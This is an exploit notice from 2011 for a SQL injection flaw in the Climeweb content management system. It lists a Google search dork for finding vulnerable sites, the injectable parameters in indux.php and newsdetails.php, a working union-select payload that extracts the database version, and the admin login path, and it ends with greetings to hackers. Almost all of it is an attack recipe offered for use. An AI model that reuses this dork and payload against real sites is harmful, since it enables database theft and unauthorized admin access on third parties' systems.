========================================================================== # Exploit Title: Climeweb Blind SQL Injection Vulnerability # Date: 11.10.2011 # Author: poach3r # Software Link: http://www.climeweb.com/ # Tested on: Windows XP SP3 # Google Dork: "Powered by Climeweb" inurl:"indux.php" ========================================================================== # Exploit : http://127.0.0.1/path/indux.php?id=[SQL] http://127.0.0.1/path/newsdetails.php?News_Id=[SQL] # Demo : http://127.0.0.1/path/indux.php?id=-2+union+select+1,version(),3,4,5+admin-- # Admin Page : http://127.0.0.1/path/admin/login.php ========================================================================== # GreetZ To : All IRANIAN HackerZ ./End